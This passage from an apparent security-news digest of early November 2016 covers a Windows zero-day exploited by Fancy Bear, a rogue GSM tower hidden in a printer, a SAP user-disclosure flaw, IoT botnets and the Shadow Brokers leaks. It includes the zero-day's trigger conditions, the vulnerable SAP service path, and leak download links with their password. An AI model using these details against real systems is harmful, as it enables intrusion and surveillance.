Since SHA-1 certs could result in system downtime, errors, and security threats, all organizations need to migrate to SHA-2 signed certificates before January 1, 2017.
ManageEngine solves this issue as well. Here's a quick step-by-step guide on how to find and replace SHA-1 with secure SHA-2 certificates in your organization using ManageEngine Key Manager Plus.
Conclusion: ManageEngine Key Manager Plus is an efficient and user-friendly solution that not only helps network administrators bypass complicated and time-consuming compliance processes by providing all the necessary tools for monitoring and managing SSL certificates and SSH keys in the first place, but also predict and prevent security breaches at their organizations.
So, if ManageEngine Key Manager Plus fits for your organization, you can give it a try. The company offers three edition of the latest Key Manager Plus version is 4.5, which includes:
Free Edition: This version of Key Manager Plus is free for lifetime and offers you to manage up to 5 keys in an organization.
Evaluation Edition: This version is a 30-day evaluation edition that allows you to manage up to 10 keys in an organization (Number of keys can be increased based on request during the period of evaluation).
Standard Edition: The prices for this edition start at $595 per year for managing 50 keys.
All editions of ManageEngine Key Manager Plus can be downloaded (Windows/Linux) directly from the ManageEngine official website, and an online demo is also available, in case you want to have a quick look to the application.
Microsoft Says Russian Hackers Using Unpatched Windows Bug Disclosed by Google
2.11.2016 thehackernews Vulnerebility
Google's Threat Analysis Group publically disclosed on Monday a critical zero-day vulnerability in most versions of Windows just 10 days after privately disclosed both zero days to Microsoft and Adobe.
While Adobe rushed an emergency patch for its Flash Player software on October 26, Microsoft had yet to release a fix.
Microsoft criticized Google's move, saying that the public disclosure of the vulnerability — which is being exploited in the wild — before the company had time to prepare a fix, puts Windows users at "potential risk."
The result? Windows Vista through current versions of Windows 10 is still vulnerable, and now everybody knows about the critical vulnerability.
Now, Microsoft said that the company would be releasing a patch for the zero-day flaw on 8th November, as part of its regular round of monthly security updates.
Russian Hackers are actively exploiting critical Windows kernel bug
Microsoft acknowledged the vulnerability in a blog post on Tuesday, in which the company said that the Windows kernel bug was being actively exploited by a well-known sophisticated hacking group previously linked to the Russian government.
Terry Myerson, executive vice president of Microsoft's Windows and Devices group, said the flaw was being exploited on a "low-volume scale" by Strontium group, also known as Fancy Bear, Sofacy, and APT 28, in targeted attacks.
Fancy Bear is the same hacking group which has also been accused by the United States Intelligence community of hacking the US Democratic National Committee, Clinton Campaign Chair John Podesta, and former Secretary of State Colin Powell, among others.
Myerson noted that Fancy Bear abusing the Google-reported flaw had been sending spear-phishing emails in order to trick recipients into clicking on malicious links or opening bogus attachments, which end them up installing malware on their machines or disclosing their personal information.
The vulnerability (CVE-2016-7855) is a local privilege escalation bug exists in the Windows operating system kernel, which can be exploited by malware to gain admin access on any Windows system.
Once exploited, the flaw can be used to escape the sandbox protection and execute malicious code on the compromised Windows machine.
Wait another Week for Windows zero-day patch
Microsoft encouraged its customers to upgrade to Windows 10, as the Edge browser on Windows 10 Anniversary Update is not affected by the Windows kernel flaw.
Microsoft engineers are working on a Windows patch, but in the meantime, there is little you can do in order to protect yourself from this attack observed in the wild.
"We have coordinated with Google and Adobe to investigate this malicious campaign and to create a patch for down-level versions of Windows," Myerson said. "Along these lines, patches for all versions of Windows are now being tested by many industry participants, and we plan to release them publicly on the next Update Tuesday, Nov 8."
For now, you are advised to update Chrome and Adobe Flash, or remove it completely, and until Microsoft issues a fix, be careful what software you download, what websites you visit, and particularly what email links you click.
Stealth Cell Tower, how to spy on workers with a harmless printer
2.11.2016 securityaffairs Hacking
Stealth Cell Tower, it is an antagonistic GSM base station concealed in an office printer that could be used for surveillance purposes.
Are you angry with your boss or your colleagues? Do you want to spy on them? The engineer Julian Oliver has demonstrated how to do it with a tiny cellphone base station concealed in an apparently innocuous office printer.
Oliver dubbed his project Stealth Cell Tower, it is an antagonistic GSM base station concealed in an office printer.
The expert explained that the Stealth Cell Tower is part of an ongoing research on the practice of disguising cell towers as other things (i.e. like trees or church spires), in 2014 he wrote an interesting article titled “Stealth Infrastructure.”
Here, Stealth Cell Tower situates this same outdoor practice indoors, where an HP printer is perhaps the most innocuous of flora.
“Stealth Cell Tower is an antagonistic GSM base station in the form of an innocuous office printer. It brings the covert design practice of disguising cellular infrastructure as other things – like trees and lamp-posts – indoors, while mimicking technology used by police and intelligence agencies to surveil mobile phone users.” reads a blog post on the project.
Oliver used a common HP Laserjet 1320 because it has a helpful free space inside the casing, then assembled inside the device a RaspberryPi 3 with a couple of antennas, the BladeRF SDR board and some cabling to power these components.
The complete list of the hardware used by the expert includes:
A Hewlett Packard Laserjet 1320 printer modified to contain and power components
BladeRF x40
Raspberry Pi 3
2x short GSM omnidirectional antennae with magnetic base
2x SMA cable
Cigarette-lighter-to-USB-charger circuit (converting 12-24v to 5v)
1x USB Micro cable (cut and soldered to output of USB charger)
1x USB A cable (cut and soldered to printer mainboard)
Oliver explained that the Raspberry Pi 3 was chosen after failed attempts to achieve stable YateBTS performance on the Intel Edison, Beaglebone Black and I-MX6 Marsboard, that were first choices due to their small footprint.
“The Raspberry Pi 3 was chosen after failed attempts to achieve stable YateBTS performance on the Intel Edison (tiny – would’ve saved space!), Beaglebone Black and even an I-MX6 Marsboard,” he wrote. “Unlike the antiquated OpenBTS, YateBTS really seems to need those extra cores, otherwise ignoring accelerators like NEON on the Cortex A8/9 platforms.”
The core of the experiment is the code written by Oliver and running on the tiny PC, it operates as a bogus cellphone tower that detects nearby phones and sends them SMS messages.
“Masquerading as a regular cellular service provider, Stealth Cell Tower surreptitiously catches phones and sends them SMSs written to appear they are from someone that knows the recipient. It does this without needing to know any phone numbers.”
The Stealth Cell Tower is able to print for each response to the above messages a transcript that includes various information such as the captured message sent, the victim’s unique IMSI number and other identifying data. The printer also randomly calls victim’s phones in the environment and on answering, Stevie Wonder’s 1984 classic hit I Just Called To Say I Love You is heard.
It is clear that a similar configuration could be used in a real attack scenario, for example by sending out phishing SMS messages or to perform man-in-the-middle attacks against workers.
In short, it could become a very powerful surveillance device, the next time you mount a printer in the office, look inside.
You can download the full code used by the expert here (sha256sum eaabeb72eb5bf3e62cbfedb43dbc623437b40728b25555d88c9e8f06ca31d090).
Philip Hammond invokes an active defence of UK hacking back the attackers
2.11.2016 securityaffairs Hacking
The British Government announces an active defence posture in response to nation-state cyber attacks, Chancellor warns UK will retaliate against attacks.
Hacking back, or “active defence” as security experts prefer to call it, is becoming a high debated argument.
While the number of cyber attacks continues to increase and attackers are using even more sophisticated techniques, many Governments are planning to hack back crooks and nation-state hackers that threaten their infrastructure.
Recently a china’s cybersecurity draft law plans to hit back foreign hackers that power.
The British government fears that “old legacy IT systems used by many organizations in the UK” are increasingly targeted by hackers who have no problem to compromise them.
Britain will strike back against nation-state actors that will launch cyber attacks on the national critical infrastructure.
Chancellor Philip Hammond promised retaliatory countermeasures in response to state-sponsored attacks, he also unveiled a £1.9bn package designed to boost Government defenses against cyber threats as part of a five-year national cyber security strategy.
The strategy of the UK Government has a five-year plan and aims to “work to reduce the impact of cyber attacks and to drive up security standards across public and private sectors.”
Philip Hammond he reiterated that the measures are a question of national security.
UK active defence chancellor-philip-hammond
Source The telegraph
The most interesting part of the measures announced by Hammond, is the intention of the UK Government to adopt an active defence model which includes possible offensives against attackers. Hammond explained that hack back is the unique alternative to a conflict.
“Speaking before the launch, Hammond said Britain must “keep up with the scale and pace of the threats we face” and insisted that the new funding will “allow us to take even greater steps to defend ourselves in cyberspace and to strike back when we are attacked”.” reported The Guardian
“The money – which almost doubles the amount set out for a similar strategy in 2011 – will be used to improve automated defences to safeguard citizens and businesses, support the cybersecurity industry and deter attacks from criminals and “hostile actors”.”
Hammond announced a new posture of the UK against the cyber threats, with a specific focus on the protection of the nation’s critical national infrastructure and business.
“We will deter those who seek to steal from us, or harm our interests,” Hammond told at the Microsoft’s Future Decoded conference in London on Tuesday. “We will strengthen law enforcement to raise cost and reduce rewards,” he said of criminal attackers.
This is just first step ahead in cyber security matter, he promised the UK would “continue to invest in cyber defense capabilities,” in particular in the technology that could allow the British cyber army to trace and hack back the state-sponsored hackers.
“If we don’t have the ability to respond in cyberspace to attack that takes down power networks or air traffic control systems we would be left with the impossible choice of turning the other cheek or resorting to a military response – that’s a choice we don’t want to face.”
“No doubt the precursor to any state-on-state conflict would be a campaign of escalating cyber attack. We will not only defend ourselves in cyberspace but will strike back in kind when attacked.”
In the same day, Hammond, who chairs the Cabinet’s cross-department cyber-security committee, had listed high-profile cyber attacks against British critical infrastructure.
The active defence model implemented by the UK Government includes a new generation software to detect and repel cyber attacks and also the creation of dedicated cyber units.
Hammond pointed to the recent deployment of an application that was able to zero incidence of 50,000 fraudulent emails from crooks that pretend to be sent from Government offices.
Hammond also referenced the TalkTalk data breach that exposed details of 156,959 customers and that lead the Information Commissioner to fine the company £400,000.
“CEOs and boards must recognise they have responsibility to manage cybersecurity,” Hammond said.
Hammond stressed the adoption of a proper security posture also for private businesses that are a privileged target of hackers.
“Similarly, technology companies must take responsibility for incorporating the best possible security measures into the technology of their products. Getting this right will be crucial to keeping Britain at the forefront of digital security technology.”
No doubts, the active defence is the new approach of many governments in response to the growing cyber threats.
An information disclosure flaw still impacts SAP Systems to the Internet
2.11.2016 securityaffairs Vulnerebility
Experts from ERPScan revealed that a SAP flaw patched in September still impacts more than 900 SAP systems exposed to the Internet.
An information disclosure vulnerability in SAP that was patched in September impacts more than 900 SAP systems that are exposed to the Internet.
According to the expert Sergiu Popa from Quenta Solutions who reported the vulnerability, the flaw could be exploited by a remote attacker to obtain the list of SAP users from the vulnerable system. An attacker can trigger the flaw to obtain users’ data, including usernames, user IDs and emails, all information that could be used to launch spear phishing attacks and power spam campaign.
“The vulnerability allows an external attacker to remotely obtain the list of SAP users from the system by exploiting an information disclosure vulnerability in the following service:”
/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/
com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate
“This service is actually an example of application to create a time-off request. This service should not be activated in production systems, however, it’s installed by default and, in reality, few SAP customers disable the component.
The vulnerability allows obtaining usernames, user IDs and even emails if this information was provided by a user. The information related to username and email can be used for a phishing attack by sending a malware to these users.”wrote Alexander Polyakov, founder of ERPScan, in a blog post.
It has been estimated more than 15% of all SAP systems exposed to the Internet are vulnerable to this flaw, according to ERPScan, currently, there are at least 941 vulnerable SAP systems exposed to the Internet.
Other similar flaws were found affecting SAP web service, experts at ERPScan have recently helped to fix two similar issues in other applications.
“To make matters worse, an SAP system has 1000+ of such applications enabled by default. Thus, there is a need for detailed analysis of all exposed web services,” added Polyakov from ERPScan.
ERPScan reported this vulnerability for the first time on July 12, but avoided to disclose the details on it for three months, to comply with SAP’s policy on publicly disclosing information on vulnerabilities.
Recent Windows Kernel zero-day exploited by hackers behind the DNC hack
2.11.2016 securityaffairs Vulnerebility
Executive vice president of Microsoft’s Windows and Devices group revealed that Windows Kernel zero-day recently disclosed was used by the Fancy Bear APT.
On Oct. 31, the Google Threat Analysis Group publicly disclosed a vulnerability in the Windows kernel that is actively being exploited by threat actors in the wild.
The zero-day could be exploited by attackers to gain administrator-level access by escaping the sandbox protection and execute malicious code.
The reason for going public without waiting for a patch is that its experts have observed exploits for the flaw in the wild.
According to Google disclosure timeline for vulnerability, when a flaw is exploited in the wild Google public disclosed the flaw after seven days.
“On Friday, October 21st, we reported 0-day vulnerabilities — previously publicly-unknown vulnerabilities — to Adobe and Microsoft. Adobe updated Flash on October 26th to address CVE-2016-7855; this update is available via Adobe’s updater and Chrome auto-update.” reads a blog post published by Google.
“After 7 days, per our published policy for actively exploited critical vulnerabilities, we are today disclosing the existence of a remaining critical vulnerability in Windows for which no advisory or fix has yet been released. This vulnerability is particularly serious because we know it is being actively exploited.”
On the other end, Microsoft criticized the Google decision because the disclosure potentially puts customers at risk.
“We believe in coordinated vulnerability disclosure, and today’s disclosure by Google puts customers at potential risk,” a Microsoft spokesperson said in a statement. “Windows is the only platform with a customer commitment to investigate reported security issues and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection.”
Terry Myerson, executive vice president of Microsoft’s Windows and Devices group, confirmed that the Windows kernel vulnerability was being exploited by an APT group in the wild, and the real surprise is that the hacker crew is the same that breached the Democratic National Committee and that targeted individuals involved in Clinton’s Presidential campaign.
Microsoft identifies the APT group as STRONTIUM, Pawn-Storm, APT28, and Fancy Bear are more familiar for us. This means that another Tech Giant has recognized the APT has well founded and capable of high-sophisticated operations. Many security firms argue the Fancy Bear is linked to the Kremlin and detailed their investigation that lead the experts into believe that it is a Russian nation-state group.
Myerson highlighted the importance of upgrading to Windows 10 for protection from further advanced threats while waiting for a patch for the Windows Kernel zero-day.
“Recently, the activity group that Microsoft Threat Intelligence calls STRONTIUMconducted a low-volume spear-phishing campaign. Customers using Microsoft Edge on Windows 10 Anniversary Update are known to be protected from versions of this attack observed in the wild. This attack campaign, originally identified by Google’s Threat Analysis Group, used two zero-day vulnerabilities in Adobe Flash and the down-level Windows kernel to target a specific set of customers.” reads the security advisory published by Microsoft.
Microsoft customers using Windows 10 with Windows Defender Advanced Threat Detection are not exposed to the exploitation of the flaw.
“Customers who have enabled Windows Defender Advanced Threat Protection (ATP) will detect STRONTIUM’s attempted attacks thanks to ATP’s generic behavior detection analytics and up-to-date threat intelligence.” continues the advisory.
Fancy Bear was one of the two APT groups involved in the DNC hack, COZY BEAR and FANCY BEAR, it powered many other attacks, including the hacks of both Clinton campaign Chair John Podesta and the former Secretary of State Colin Powell.
At the time I was writing there is no news about the possible use of the Windows Kernel zero-day as part of the above attacks.
Které kybernetické hrozby jsou momentálně největší?
2.11.2016 SecurityWorld Viry
Trojský kůň Fraud dokáže změnit systémové soubory a nastavení v napadeném zařízení, varují experti před stále se stupňující hrozbou v tuzemsku.
Nejrozšířenější počítačovou hrozbou současnosti v České republice je škodlivý kód Danger, který se šíří prostřednictvím příloh e-mailů. Vyplývá to z pravidelné měsíční statistiky bezpečnostní společnosti Eset za měsíc říjen.
Danger se drží v čele internetových hrozeb po většinu letošního roku, jeho podíl na detekovaných hrozbách ale začal klesat. V říjnu představoval zhruba třetinu detekcí malware (konkrétně 35,02 procenta), což je o 12 procentních bodů méně než v září. „Rozhodně se nedá říci, že by nebezpečí JS/Danger.ScriptAttachment polevovalo. Nadále zůstává s velkým náskokem největší hrozbou. Do napadeného zařízení dokáže stáhnout další škodlivé kódy, což z něj činí ještě zákeřnějšího nepřítele,“ říká Miroslav Dvořák, technický ředitel Esetu.
Na podobném principu pracuje i další downloader Nemucod, který byl v říjnu druhou nejčastěji zaznamenanou internetovou hrozbou. I jeho podíl ale oproti září viditelně klesl, a to o devět procentních bodů na hodnotu 12,32 procenta.
Třetí příčku v seznamu deseti nejčastěji odhalených nebezpečných kódů v říjnu zaujal trojský kůň PDF/Fraud. „Záměrem tvůrců je prostřednictvím tohoto malware přesvědčit uživatele, aby vyplnil a odeslal svoje citlivé osobní údaje,“ popisuje Dvořák. PDF/Fraud podle něj v říjnu představoval téměř pět procent všech zjištěných hrozeb na českém internetu.
Top 10 hrozeb v České republice za říjen 2016:
1. JS/Danger.ScriptAttachment (35,02 %)
2. JS/TrojanDownloader.Nemucod (12,32 %)
3. PDF/Fraud (4,99 %)
4. Java/Adwind (3,58 %)
5. JS/TrojanDownloader.FakejQuery (3,03%)
6. DOC/Fraud (2,86 %)
7. JS/Kryptik.RE (1,95 %)
8. VBA/TrojanDownloader.Agent.BUX (1,54 %)
9. PowerShell/TrojanDownloader.Agent.Q (1,46 %)
10. JS/ProxyChanger (1,31 %)
Kybernetické útoky jsou stále agresivnější. Británie výrazně zvýší výdaje na bezpečnost
1.11.2016 Novinky/Bezpečnost Počítačový útok
Británie posílí boj s kybernetickou kriminalitou. Na zlepšení své bezpečnosti vydá v příštích pěti letech 1,9 miliardy liber (57,2 miliardy Kč), oznámilo v úterý britské ministerstvo financí. Šéf tajné služby MI5 Andrew Parker varoval před „stále agresivnějšími” metodami Ruska, které se podle něj v soupeření se Západem spoléhá daleko častěji právě na kybernetické útoky.Investice by se měly soustředit na ochranu institucí i občanů proti útokům hackerů. Částku 1,9 miliardy liber vynaloží Londýn na boj s kybernetickým zločinem v průběhu příštích pěti let. Oproti předchozímu pětiletému období jde o zvýšení rozpočtu o polovinu.
„Nová strategie nám umožní podnikat výraznější kroky na naši obranu v kyberprostoru a odpovědět na útok, až budeme napadeni," uvedl Hammond ve zprávě ministerstva financí.
Britská vláda chce v následujících letech vytvořit také nový ústav, který se bude zabývat výzkumem kybernetické bezpečnosti. Fungovat bude paralelně s Národním střediskem kybernetické bezpečnosti (NCSC), které zahájilo svou činnost v říjnu a má zhruba 700 zaměstnanců.
Ředitel tajné služby MI5 v rozhovoru poskytnutém listu The Guardian dnes varoval, že Rusko se stává pro Británii stále větší hrozbou. K destabilizaci země podle něj Moskva používá sofistikované metody včetně kybernetických útoků. Rusko se hackerskými útoky snaží získat vojenská tajemství, informace o průmyslu a hospodářství i vládní a zahraniční politice, tvrdí Parker.
WiGig — New Ultra-Fast Wi-Fi Standard Ready to Boost Your Internet Speed in 2017
1.11.2016 thehackernews IT
Get ready for faster Internet because the WiFi you know today is about to change and get much, much faster.
The WiFi Alliance, a self-described "worldwide network of companies that brings you Wi-Fi," has finally certified "WiGig," an ultra-fast, short-range wireless network technology that will nearly double Wi-Fi's current top speed.
As many as 180 Million devices, including routers, smartphones, laptops, tablets, and other devices, arriving by the end of next year will support WiGig or multi-gigabit Wi-Fi 802.11ad on the 60 gigahertz band, the Alliance announced.
This certification program aims to encourage the production of devices and hardware that not only operate in the "less congested" 60 GHz spectrum but can also fall back to the regular Wi-Fi – 2.4 or 5 gigahertz bands – for maximum interoperability.
"Wi-Fi has delighted users for more than 15 years, and WiGig now gives users even higher performance in a rich variety of applications unleashing an unparalleled Wi-Fi experience," Wi-Fi Alliance CEO Edgar Figueroa said.
"WiGig further expands the Wi-Fi CERTIFIED portfolio into 60 GHz, and will augment existing and developing Wi-Fi programs and technologies."
WiGig can provide speeds of up to 8 Gbps, or nearly 1GB per second from a distance of up to 33 feet (10 meters). 8 Gbps is around three times faster than the best available devices on 802.11ac protocol right now.
This speed boost will help you download high-quality HD movies in just seconds. Also, the technology will make it possible to have super-fast wireless docks and wireless VR and AR headsets.
However, both ends of a connection should support WiGig the technology to achieve supported speeds.
The major issues with WiGig are adoption and compatibility. The WiFi Alliance also uncovered the first five certified WiGig products from Intel, Qualcomm, and Dell, among others.
The first certified consumer products to carry the WiGig standard is the Dell's Latitude 7450 and 7470 laptops, though the technology is eventually making its way into routers, tablets, notebooks, smartphones, and other categories.
Both Intel and Qualcomm have also certified router solutions. However, some companies such as Samsung have already released uncertified WiGig hardware.
The Wi-Fi Alliance expects its new WiGig standard to take off by 2017.
Shadow Brokers reveals list of Servers Hacked by the NSA
1.11.2016 thehackernews BigBrothers
The hacker group calling itself the Shadow Brokers, who previously claimed to have leaked a portion of the NSA’s hacking tools and exploits, is back with a Bang!
The Shadow Brokers published more files today, and this time the group dumped a list of foreign servers allegedly compromised by the NSA-linked hacking unit, Equation Group, in various countries to expand its espionage operations.
Top 3 Targeted Countries — China, Japan, and Korea
The data dump [Download / File Password: payus] that experts believe contains 306 domain names, and 352 IP addresses belong to at least 49 countries. As many as 32 domains of the total were run by educational institutes in China and Taiwan.
A few target domains were based in Russia, and at least nine domains include .gov websites.
The top 10 targeted countries include China, Japan, Korea, Spain, Germany, India, Taiwan, Mexico, Italy, and Russia.
The latest dump has been signed by the same key as the first Shadow Brokers’ dump of NSA exploits, though there is a lot to be done to validate the contents of the leaked data dump fully.
Targeted Systems — Solaris, Unix, Linux and FreeBSD
Most of the affected servers were running Solaris, Oracle-owned Unix-based operating system, while some were running FreeBSD or Linux.
Each compromised servers were reportedly targets of INTONATION and PITCHIMPAIR, code-names given for cyber-spy hacking programs.
The data dump also contains references to a list of previously undisclosed Equation Group tools, including Dewdrop, Incision, Orangutan, Jackladder, Reticulum, Patchicillin, Sidetrack and Stoicsurgeon.
The tools as mentioned above could be hacking implants, tools or exploits used by the NSA's notorious group.
Security researcher Mustafa Al-Bassam, an ex-member of Lulzsec and the Anonymous hacking collective, said the NSA likely compromised all the servers between 2000 and 2010.
"So even the NSA hacks machines from compromised servers in China and Russia. This is why attribution is hard," Al-Bassam added.
Are Hackers trying to influence U.S. Presidential elections?
A message accompanying the leaked data dump calls for attempts to disrupt the forthcoming United States presidential election. The portion of message from the Shadow Brokers reads:
"TheShadowBrokers is having suggestion. On November 8th, instead of not voting, maybe be stopping the vote all together? Maybe being grinch who stopped the election from coming? Maybe hacking election is being the best idea? #hackelection2016."
Targeted victims can use the leaked files in an effort to determine if they were the potential target of the NSA-linked hacking unit.
Since the records are old, many servers should now be clean of infection. However, a brief Shodan scan of these domains indicates that some of the affected servers are still active and still running old, possibly-vulnerable systems.
The latest release comes after the FBI arrested Harold Thomas Martin, an NSA contractor, who was reportedly a prime suspect in The Shadow Brokers case.
Google discloses Critical Windows Zero-Day that makes all Windows Users Vulnerable
1.11.2016 thehackernews Vulnerebility
Google has once again publicly disclosed a zero-day vulnerability in current versions of Windows operating system before Microsoft has a patch ready.
Yes, the critical zero-day is unpatched and is being used by attackers in the wild.
Google made the public disclosure of the vulnerability just 10 days after privately reporting the issue to Microsoft, giving the chocolate factory little time to patch issues and deploy a fix.
According to a blog post by Google's Threat Analysis Group, the reason behind going public is that it has seen exploits for the vulnerability in the wild and according to its internal policy, companies should patch or publicly report such bugs after seven days.
Windows Zero-Day is Actively being Exploited in the Wild
The zero-day is a local privilege escalation vulnerability that exists in the Windows operating system kernel. If exploited, the flaw can be used to escape the sandbox protection and execute malicious code on the compromised system.
The flaw "can be triggered via the win32k.sys system call NtSetWindowLongPtr() for the index GWLP_ID on a window handle with GWL_STYLE set to WS_CHILD," Google's Neel Mehta and Billy Leonard said in a blog post.
"Chrome's sandbox blocks win32k.sys system calls using the Win32k lockdown mitigation on Windows 10, which prevents exploitation of this sandbox escape vulnerability."
The blog post also notes that Google reported a zero-day flaw (CVE-2016-7855) in Flash Player to Adobe at the same time as it contacted Microsoft. Adobe pushed an emergency patch for its software last Wednesday.
The Flash Player bug was also being exploited in the wild against organizations in targeted attacks. According to Adobe, the flaw affected Windows 7, 8.1 and 10 systems.
Since the Windows zero-day vulnerability is being actively exploited in the wild, Google shared only basic details about the bug on Monday.
Microsoft has yet to Rolled out a Fix
Needless to say, Microsoft is not at all happy about the disclosure.
In response, Microsoft said Google's disclosure has potentially placed customers at risk, adding that the company believes in coordinated vulnerability disclosure.
"We believe in coordinated vulnerability disclosure, and today’s disclosure by Google puts customers at potential risk," a Microsoft spokesperson said in a statement. "Windows is the only platform with a customer commitment to investigate reported security issues and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection."
Microsoft has not provided any details as to when the company will roll out a fix for the flaw.
This is not the very first time that Google and Microsoft have been at odds over vulnerability disclosure. Microsoft has a long history of bungling patches, so the move could eventually lead the company into quickly rolling out an update.
Meanwhile, users are advised to update their Flash software now and apply Windows patches as soon as they become available.
New IoT Botnet Malware Discovered; Infecting More Devices Worldwide
1.11.2016 thehackernews BotNet
The whole world is still dealing with the Mirai IoT Botnet that caused vast internet outage last Friday by launching massive distributed denial of service (DDoS) attacks against the DNS provider Dyn, and researchers have found another nasty IoT botnet.
Security researchers at MalwareMustDie have discovered a new malware family designed to turn Linux-based insecure Internet of Things (IoT) devices into a botnet to carry out massive DDoS attacks.
Dubbed Linux/IRCTelnet, the nasty malware is written in C++ and, just like Mirai malware, relies on default hard-coded passwords in an effort to infect vulnerable Linux-based IoT devices.
The IRCTelnet malware works by brute-forcing a device's Telnet ports, infecting the device's operating system, and then adding it to a botnet network which is controlled through IRC (Internet Relay Chat) – an application layer protocol that enables communication in the form of text.
So, every infected bot (IoT device) connects to a malicious IRC channel and reads commands sent from a command-and-control server.
The concept of using IRC for managing the bots, according to the researchers, is borrowed from the Kaiten malware. The source code used to build the IRCTelnet botnet malware is based on the earlier Aidra botnet.
The malware uses the "leaked" vulnerable IoT device's login credential from the Mirai botnet in order to brute force exposed Telnet ports to the Internet.
The IRCTelnet malware infects insecure devices running a Linux Kernel version 2.6.32 or above and capable of launching DDoS attacks with spoofed IPv4 and IPv6 addresses, though the scanner is programmed only to find and brute-force Telnet via IPv4.
"The botnet is having DoS attack mechanism like UDP flood, TCP flood, along with other attack methods, in both IPv4 and IPv6 protocol, with extra IP spoof option in IPv4 or IPv6 too," the researchers note in a blog post.
While analyzing the malware's source code, researchers found hard-coded Italian language messages in the user's communication interface, which suggests that the author of the IRCTelnet malware could be Italian.
The security firm found around 3,400 bots infected by the IRCTelnet malware and said that this nasty malware is capable of raising almost 3,500 bot clients within only 5 days.
The initial scans that distributed the IRCTelnet malware came from IP addresses located in Turkey, Moldova, and the Philippines.
Building a legendary, massive botnet that leverages recently vulnerable threat landscape is inviting more incidents like the recent DDoS attack against Dyn that rendered major websites inaccessible, and record-breaking DDoS attack against French Internet service and hosting provider OVH.
NSA Hackers The Shadow Brokers leaked another dump with NSA targets
1.11.2016 securityaffairs BigBrothers
The ShadowBrokers hacker group leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.
The notorious Shadow Brokers hacker group has posted a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.
The hackers disclosed the list containing historic targets of the Equation Group, it includes Mail providers, Chinese targets, and universities.
The Equation group compromised the targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR.
The latest dump leaked by the Shadow Brokers was signed using the same key used to sign the first dump of Equation Group exploits.
The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .
The first archive contains roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.
The security researchers Mustafa Al-Bassam has published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.
The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.
The majority of files are at least three years old, meanwhile, the newest timestamp dating to October 2013.
Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.
A couple of weeks ago the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.
Back to the present day, the ShadowBrokers hackers published message accompanying the latest dump.
“TheShadowBrokers is having special trick or treat for Amerikanskis tonight.” “Why is DirtyGrandpa threating CIA cyberwar with Russia? Why not threating with NSA or CyberCommand? CIA is cyber B-Team, yes? Where is cyber A-Team? Maybe threating is not being for external propaganda? Maybe is being for internal propaganda? Oldest control trick in book, yes? Waving flag, blaming problems on external sources, not taking responsibility for failures. But neverminding, hacking DNC is way way most important than EquationGroup losing capabilities. Amerikanskis is not knowing USSA cyber capabilities is being screwed? Where is being “free press”? Is ABC, NBC, CBS, FOX negligent in duties of informing Amerikanskis? Guessing “Free Press” is not being “Free as in free beer” or “Free as in free of government influence?” reads the message.
According to security experts, the list is very old, it is available at the following links
https://mega.nz/#F!D1Q2EQpD!Lb09shM5XMZsQ_5_E1l4eQ
https://yadi.sk/d/NCEyJQsBxrQxz
Password = payus
Segui
Kevin Beaumont ✔ @GossiTheDog
The Shadow Brokers continue to grapple for publicity and money. The list of servers is 9 years old, likely no longer exist or reinstalled. https://twitter.com/shadowbrokerss/status/792936856925143040 …
09:18 - 31 Ott 2016
6 6 Re 17 17 Mi piace
A close look at the dump revealed that it contains some 300 folders of files. Each file corresponds to a different domain and IP address.
The notorious expert Hacker Fantastic analyzed the dump and confirmed that it contains 306 domains and 352 IP addresses relating to 49 countries in total.
Segui
Hacker Fantastic @hackerfantastic
306 domain names, 352 ip addresses contained in @shadowbrokerss leak, mostly ASIAPAC region. descriptions here http://pastebin.com/RK73grmu
10:26 - 31 Ott 2016
21 21 Re 16 16 Mi piace
Visualizza l'immagine su Twitter
Visualizza l'immagine su Twitter
Segui
Hacker Fantastic @hackerfantastic
There are 49 countries impacted by the Solaris attack exposed by @shadowbrokerss - vast majority of those are in ASIAPAC region.
11:53 - 31 Ott 2016
31 31 Re 14 14 Mi piace
The dump revealed targets in Russia, China, India, Sweden, and many other countries. The Top 10 countries include also Japan and Italy.
The colleague Carola Frediani reported the presence of Italian targets that includes systems in some university, such as the Università dell’Aquila (sipralab.univaq.it; matematica.univaq.it; ns.univaq.it) and the ‘Università degli Studi Mediterranea di Reggio Calabria (ns.ing.unirc.it).
Below a graph from by a preliminary study conducted by the researcher Quequero @quequero on addresses published by the ShadowBrokers and allegedly used by the NSA as staging servers/C&C.
The machines compromised by the US Intelligence may have been used to target systems worldwide and deliver exploits.
Visualizza l'immagine su TwitterVisualizza l'immagine su TwitterVisualizza l'immagine su Twitter
Segui
Mustafa Al-Bassam @musalbas
New Shadow Brokers dump contains list of servers compromised by the NSA to use as exploit staging servers.
Office of the Comptroller of the Currency reported a former employee stolen data from office
1.11.2016 securityaffairs Incindent
A former employee of the Office of the Comptroller of the Currency downloaded 10,000 records onto thumb drives before his retirement in November 2015.
On Friday, the US banking regulator told Congress about a potential “major information security incident” after it discovered that a former employee has downloaded a large number of files onto thumb drives before his retirement in November 2015. According to the Office of the Comptroller of the Currency, there was no evidence that suggests that the former employee has publicly disclosed the data neither he has misused it.
The Office of the Comptroller is tasked with protecting consumers and the regular activity on financial markets.
The banking regulator confirmed the former employee downloaded a large number of files onto two removable thumb drives, the stolen information was encrypted. According to the Office of the Comptroller of the Currency, the security breach was only detected last month after a routine security assessment.
The OCC reported that when the former employee was contacted by the Agency, he “was unable to locate or return the thumb drives to the agency.”
“The OCC has deemed the breach a “major incident” because the devices containing the information are not recoverable and more than 10,000 records were removed, the agency said.” reported the Reuters.
